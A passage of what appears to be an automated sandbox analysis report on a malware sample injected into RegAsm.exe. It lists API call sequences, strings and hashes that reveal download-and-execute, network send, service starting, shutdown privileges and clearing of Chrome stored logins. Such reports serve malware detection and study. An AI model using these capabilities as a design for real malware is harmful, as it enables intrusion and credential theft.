                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2341273852-0
                                                                                                                                                                      • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                      • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                                                      • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Find$CreateFirstNext
                                                                                                                                                                      • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                                                      • API String ID: 341183262-3812160132
                                                                                                                                                                      • Opcode ID: aa59f9ecc51ac9995beebab4226db6d4b619e4562328fe3ad9613b4503449ce7
                                                                                                                                                                      • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                                                      • Opcode Fuzzy Hash: aa59f9ecc51ac9995beebab4226db6d4b619e4562328fe3ad9613b4503449ce7
                                                                                                                                                                      • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1888522110-0
                                                                                                                                                                      • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                      • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                                                      • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                      • API String ID: 2127411465-314212984
                                                                                                                                                                      • Opcode ID: 21d2bd2d6723997ffbf1e0732cb0f686b590d152505873c50cb7564f0e434579
                                                                                                                                                                      • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                                                      • Opcode Fuzzy Hash: 21d2bd2d6723997ffbf1e0732cb0f686b590d152505873c50cb7564f0e434579
                                                                                                                                                                      • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00449292
                                                                                                                                                                      • _free.LIBCMT ref: 004492B6
                                                                                                                                                                      • _free.LIBCMT ref: 0044943D
                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                                                                      • _free.LIBCMT ref: 00449609
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 314583886-0
                                                                                                                                                                      • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                      • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                                                                                                                                      • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                                                                                                                                      • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                        • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                        • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                        • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                        • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                                                                                                                                      • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                      • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                      • API String ID: 1589313981-2876530381
                                                                                                                                                                      • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                      • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                                                                                                                                      • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BA93
                                                                                                                                                                      Strings
                                                                                                                                                                      • UserProfile, xrefs: 0040BA59
                                                                                                                                                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                                                                                                                                      • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                                                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                      • API String ID: 2018770650-1062637481
                                                                                                                                                                      • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                      • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                                                      • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 3534403312-3733053543
                                                                                                                                                                      • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                      • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                                                      • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                                                      • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                                                        • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02234948,00000010), ref: 004048E0
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                                                        • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                        • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                        • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1824512719-0
                                                                                                                                                                      • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                                                                      • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                                                                                                      • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                                                                                                                                      • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 276877138-0
                                                                                                                                                                      • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                      • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                                                                                                      • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                                                                                                      • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                                                      • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                      • API String ID: 2299586839-711371036
                                                                                                                                                                      • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                      • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                                      • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                      • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                                                      • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                      • String ID: SETTINGS
                                                                                                                                                                      • API String ID: 3473537107-594951305
                                                                                                                                                                      • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                      • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                                                      • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1157919129-0
                                                                                                                                                                      • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                      • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1771804793-0
                                                                                                                                                                      • Opcode ID: 5adf80dd010b7e34ca961d25f929f8e7600ba30a6adf491365bde7e26c19110d
                                                                                                                                                                      • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                                                      • Opcode Fuzzy Hash: 5adf80dd010b7e34ca961d25f929f8e7600ba30a6adf491365bde7e26c19110d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DownloadExecuteFileShell
                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                                                      • API String ID: 2825088817-3056885514
                                                                                                                                                                      • Opcode ID: c0d078bf0315f94293dc3ec17d1a86d1ef83da94f9faf21a2cb0fd5468fc728f
                                                                                                                                                                      • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                                                      • Opcode Fuzzy Hash: c0d078bf0315f94293dc3ec17d1a86d1ef83da94f9faf21a2cb0fd5468fc728f
                                                                                                                                                                      • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
